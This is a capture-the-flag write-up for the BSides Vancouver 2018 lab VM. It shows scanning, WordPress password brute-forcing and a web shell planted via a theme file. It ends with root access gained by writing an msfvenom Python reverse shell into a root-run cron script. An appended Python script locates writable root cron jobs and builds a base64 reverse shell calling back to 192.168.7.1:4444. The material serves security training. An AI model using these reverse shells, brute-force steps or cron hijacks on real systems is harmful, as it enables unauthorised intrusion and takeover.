[Write-up] BSides-Vancouver

    About

    1. Download link
    2. Goal: obtain flag.txt in the root user's home directory
    3. No screenshots throughout!

    Information gathering

    1. The VM's network adapter is set to Host-only, so it sits on the vmnet1 interface and the subnet is 192.168.7.1/24 (i.e. 192.168.7.0/24).
    2. nmap -T4 192.168.7.1/24 -A
    Nmap scan report for 192.168.7.128
    Host is up (0.00040s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 2.3.5
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public
    22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
    |   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
    |_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/backup_wordpress
    |_http-server-header: Apache/2.2.22 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds
    
    3. The output above shows port 21 open (FTP), and anonymous login is allowed.

      Open it in the browser: ftp://192.168.7.128/public/users.txt.bk

    4. Port 80 is open too, and robots.txt disallows a /backup_wordpress directory.

      That is obviously a WordPress install, so run wpscan against it.

    5. wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate

    [+] WordPress theme in use: twentysixteen - v1.2
    
    [+] Name: twentysixteen - v1.2
     |  Last updated: 2018-05-17T00:00:00.000Z
     |  Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/
     |  Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
    [!] The version is out of date, the latest version is 1.5
     |  Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css
     |  Referenced style.css: wp-content/themes/twentysixteen/style.css
     |  Theme Name: Twenty Sixteen
     |  Theme URI: https://wordpress.org/themes/twentysixteen/
     |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
     |  Author: the WordPress team
     |  Author URI: https://wordpress.org/
    
    [+] Enumerating usernames ...
    [+] We identified the following 2 users:
        +----+-------+------+
        | ID | Login | Name |
        +----+-------+------+
        | 1  | admin | admi |
        | 2  | john  | joh  |
        +----+-------+------+
    [!] Default first WordPress username 'admin' is still used
    

    Most of the vulnerabilities wpscan reports are XSS or other issues that need an administrator to interact, so they are hard to exploit here. What we have collected is the theme the blog uses and the user names; the administrator's username is john, which the blog posts also show.

    Brute force

    1. wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt

    2. The password found is enigma.

    3. Log in to the WordPress admin, edit the theme's 404.php through the theme editor to get a shell, and find that the shell is not running as root.

    4. Look at the scheduled tasks: cat /etc/crontab

      # /etc/crontab: system-wide crontab
      # Unlike any other crontab you don't have to run the `crontab'
      # command to install the new version when you edit this file
      # and files in /etc/cron.d. These files also have username fields,
      # that none of the other crontabs do.
       
      SHELL=/bin/sh
      PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
       
      # m h dom mon dow user    command
      17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
      25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
      47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
      52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
      *  *    * * *   root    /usr/local/bin/cleanup
      
    5. Here we can see a cleanup script, /usr/local/bin/cleanup, that root runs every minute. Check its permissions (ls -l /usr/local/bin/cleanup) before relying on it: the steps below only work because the file is writable by the user the web shell runs as, which is the case on this VM.

    6. First generate the reverse-shell payload

    kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R
    
    [sudo] password for kali-team: 
    
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    
    [-] No arch selected, selecting arch: cmd from the payload
    
    No encoder or badchars specified, outputting raw payload
    
    Payload size: 601 bytes
    
    python -c "exec('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'.decode('base64'))"
    
    
    7. Listen on local port 4444 with nc: nc -lvp 4444
    8. Copy the payload into the cleanup script, save it, and wait for the shell to call back (the job runs every minute, so it arrives within a minute).
    9. Get the flag
    kali-team@LTS:~$ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)
    ls
    flag.txt
    id
    uid=0(root) gid=0(root) groups=0(root)
    cat flag.txt
    Congratulations!
    
    If you can read this, that means you were able to obtain root permissions on this VM.
    You should be proud!
    
    There are multiple ways to gain access remotely, as well as for privilege escalation.
    Did you find them all?
    
    @abatchy17
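
    A worked example covering steps 5 and 6 together, added to this write-up and not code from the original post or from the VM: the Python script below parses a system crontab the way cron reads it (the extra user field, and the crontab's own PATH rather than the caller's), lists the root-run entries whose program, or whose run-parts directory, the current user can write to, and then builds a base64-wrapped Python reverse shell in the same shape as the msfvenom cmd/unix/reverse_python one-liner, so you can read exactly what is going into /usr/local/bin/cleanup. SAMPLE_CRONTAB is constructed from the listing above; the shell source is my own reconstruction of that payload type, not msfvenom's template; and the .decode('base64') wrapper assumes, as the page's payload does, that the target's python is Python 2 (an Ubuntu 12.04-era box, judging by the OpenSSH and Apache banners). The is_writable hook exists so the decision logic can be exercised without touching the real filesystem.

```python
# Added example for this write-up (not the original post's or the VM's code):
# find root cron jobs the current user can hijack, then build the payload.
import base64
import os
import shlex

# Constructed sample: the target's /etc/crontab as listed above.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*  *    * * *    root    /usr/local/bin/cleanup
"""
_OPERATORS = {"&&", "||", ";", "|", "(", ")"}
_BUILTINS = {"cd", "test", "[", "true", "false", "exit"}

def parse_system_crontab(text):
    """Return ([(user, command), ...], env): system crontabs have a user field
    after the five time fields, and VAR=value lines set cron's environment."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if "=" in fields[0]:
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip("\"'")
        elif len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs, env

def resolve(program, path_env):
    """Resolve a bare name through cron's own PATH, not the caller's."""
    if "/" in program:
        return program
    candidates = [os.path.join(d, program) for d in path_env.split(":")]
    return next((c for c in candidates if os.path.exists(c)), None)

def hijack_targets(command, path_env):
    """Paths whose writability lets us run code via this job: the program of
    each simple command, plus the directory that run-parts executes."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return []
    targets, expect_program = [], True
    for i, tok in enumerate(tokens):
        if tok in _OPERATORS:
            expect_program = True
        elif expect_program:
            expect_program = False
            resolved = None if tok in _BUILTINS else resolve(tok, path_env)
            if resolved:
                targets.append(resolved)
            if tok == "run-parts":  # its directory argument is the real target
                args = [a for a in tokens[i + 1:] if a in _OPERATORS or a.startswith("/")]
                if args and args[0].startswith("/"):
                    targets.append(args[0])
    return targets

def writable_root_jobs(crontab_text, is_writable=lambda p: os.access(p, os.W_OK)):
    """(command, target) pairs for root jobs whose target we can overwrite;
    is_writable is injectable so the logic can be checked without root."""
    jobs, env = parse_system_crontab(crontab_text)
    path_env = env.get("PATH", os.environ.get("PATH", ""))
    return [(cmd, t) for user, cmd in jobs if user == "root"
            for t in hijack_targets(cmd, path_env) if is_writable(t)]

# Python 2 reverse shell: fds 0/1/2 are dup2'd onto the socket, then /bin/sh
# is spawned. The .decode('base64') wrapper assumes the target's python is
# Python 2 (assumption: an Ubuntu 12.04-era box, judging by the banners).
_SHELL_SRC = (
    "import socket,subprocess,os\n"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
    "s.connect(({host!r},{port}))\n"
    "for fd in (0,1,2):\n"
    "    os.dup2(s.fileno(),fd)\n"
    "subprocess.call(['/bin/sh','-i'])\n"
)

def build_reverse_python(host, port):
    """One-liner in the shape of msfvenom's cmd/unix/reverse_python output."""
    b64 = base64.b64encode(_SHELL_SRC.format(host=host, port=port).encode()).decode()
    return "python -c \"exec('%s'.decode('base64'))\"" % b64

def decode_payload(cmdline):
    """Recover the source from such a one-liner, to read what a generated blob
    does before writing it into a root-run cron script."""
    start = cmdline.index("exec('") + len("exec('")
    return base64.b64decode(cmdline[start:cmdline.index("'", start)]).decode()

if __name__ == "__main__":
    text = open("/etc/crontab").read() if os.path.exists("/etc/crontab") else SAMPLE_CRONTAB
    for cmd, target in writable_root_jobs(text):
        print("root job %r -> writable %s" % (cmd, target))
    print(decode_payload(build_reverse_python("192.168.7.1", 4444)))
```

    Run it as the web-shell user on the target: with no arguments it reads /etc/crontab when present (falling back to the embedded sample), prints each root job whose target is writable, and prints the decoded reverse shell. Two caveats: os.access reports a missing target as not writable, so if a root job points at a file that does not exist, check the parent directory instead, since creating the file is just as good; and /etc/cron.d/* uses the same format with a user field, so feed those files through the same function.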
    

    Write-up video

    CTF-BSides Vancouver: 2018 (Workshop)

    Original article: https://www.cnblogs.com/Kali-Team/p/12210980.html